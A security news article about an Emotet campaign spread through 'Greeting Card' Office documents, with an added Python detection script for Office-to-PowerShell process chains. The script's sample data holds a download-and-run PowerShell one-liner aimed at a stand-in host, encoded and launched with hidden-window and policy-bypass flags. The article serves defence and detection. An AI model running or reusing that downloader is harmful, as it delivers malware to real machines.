Emotet Malware Delivered Via Microsoft Office Documents
A new malware campaign has been detected in which the Emotet malware is delivered through Microsoft Office document attachments named “Greeting Card”. The attackers behind this campaign used the U.S. Independence Day holiday as a lure to trick users into downloading and opening the malicious attachment on their systems.
Researchers at the security firm Zscaler detected the new campaign. A detailed post titled ‘Independence Day greeting campaign delivers Emotet’ on the Zscaler blog, dated July 06, 2018, discusses the campaign in detail. The blog post says: “Recently, Zscaler’s research team, ThreatLabZ, came across malicious Microsoft Office documents delivering Emotet malware via attachments using “Greeting Card” as the document name. The malware author leveraged the popular 4th of July holiday, the USA’s Independence Day, to lure users into downloading and opening the malicious documents. We saw over two dozen unique payloads hitting our Cloud Sandbox in the 48-hour span from July 2nd to July 4th earlier this week.”
Emotet, a banking Trojan first identified in 2014, is used by attackers to steal personal information such as usernames and passwords.
In this new Emotet campaign, the attached document contains a social-engineered message that tempts the user to enable content. Microsoft Office disables automatic execution of macros by default, so the malicious macro only runs once the user clicks “Enable Content”; the lure exists to get that click. The macro itself is obfuscated to evade detection. When executed, it launches wscript.exe, which in turn runs a heavily obfuscated PowerShell command that is difficult for security researchers to analyze. Once de-obfuscated, the PowerShell command parameters reveal the download of the Emotet payload, which is dropped into the Windows temp directory.
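The execution chain just described (Office document → enabled macro → wscript.exe → obfuscated PowerShell → payload in %TEMP%) is a good detection opportunity, because legitimate Office use almost never spawns a script host that spawns PowerShell. The following is an added example, not code from the Zscaler post or from the article: it walks simplified Sysmon-style process-creation records, flags script hosts and shells that descend from an Office application, decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE) and checks both the raw and decoded command line for downloader indicators and a payload path under TEMP. The event field names and the sample events are constructed assumptions, not captured telemetry from the campaign.

```python
"""Hunt for an Office -> wscript.exe -> PowerShell downloader chain in
process-creation telemetry. Added example with constructed, Sysmon-like
events; field names (pid, ppid, image, cmdline) are assumptions."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the argument
# is base64 over the UTF-16LE bytes of the script.
ENC_RX = re.compile(r"(?i)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Indicators typical of a macro-launched PowerShell downloader stage.
PS_INDICATORS = [
    (re.compile(r"(?i)-(?:w|win|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-(?:ep|exec|executionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)downloadfile|downloadstring|invoke-webrequest|net\.webclient"), "web download"),
    (re.compile(r"(?i)%temp%|\$env:temp|\\temp\\"), "payload path under TEMP"),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or '' if none/invalid."""
    m = ENC_RX.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def ancestry(events, pid):
    """Return the image names from the oldest known ancestor down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # seen-set guards against pid reuse loops
        seen.add(pid)
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def hunt(events):
    """Return a list of (pid, reason) findings over the given events."""
    findings = []
    for e in events:
        chain = ancestry(events, e["pid"])
        image = chain[-1]
        # Script host or shell whose ancestry includes an Office application.
        if image in SCRIPT_HOSTS | SHELLS and OFFICE_APPS & set(chain[:-1]):
            findings.append((e["pid"], "office-descended " + image + ": " + " > ".join(chain)))
        # Inspect shell command lines, including the de-obfuscated encoded script.
        if image in SHELLS:
            decoded = decode_encoded_command(e["cmdline"])
            text = e["cmdline"] + " " + decoded
            hits = [label for rx, label in PS_INDICATORS if rx.search(text)]
            if decoded:
                hits.insert(0, "encoded command")
            if hits:
                findings.append((e["pid"], "suspicious command line: " + ", ".join(hits)))
    return findings


# Constructed sample: a downloader that writes an .exe into %TEMP% and runs it,
# delivered as an encoded command exactly as a macro-launched stage would pass it.
_DOWNLOADER = ("(New-Object Net.WebClient).DownloadFile('http://example.invalid/x', "
               "$env:TEMP + '\\123.exe'); Start-Process ($env:TEMP + '\\123.exe')")
_ENCODED = base64.b64encode(_DOWNLOADER.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\Greeting Card.doc"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\gc.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc " + _ENCODED},
    # Benign admin PowerShell from the desktop shell: must not be flagged.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Process"},
]

if __name__ == "__main__":
    for pid, reason in hunt(SAMPLE_EVENTS):
        print(pid, reason)
```

Run against the sample, the script flags pid 300 (wscript.exe under WINWORD.EXE) and pid 400 twice: once for its Office ancestry and once for the command line, whose decoded payload exposes the download and the TEMP drop path that the obfuscation was meant to hide. The benign PowerShell launched from explorer.exe produces no finding. On a real endpoint the same logic applies to Sysmon Event ID 1 or EDR process-creation data, and the TEMP indicator corresponds to where this campaign writes the Emotet payload.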
Describing the Emotet payload, the Zscaler blog post says: “Emotet creates a copy of itself in “C:\windows\system32\” with the filename created by appending two strings from a predetermined set of hard-coded strings. The combination of strings is chosen based on “volume serial number” of the infected system’s volume.”
Emotet is now widely distributed, mostly through malicious spam campaigns carrying Office documents. Researchers also point out that each new wave of the malware appears with new capabilities. This multi-component malware can steal credentials from browsers and email clients, using Man-in-the-Browser attacks and email harvesting.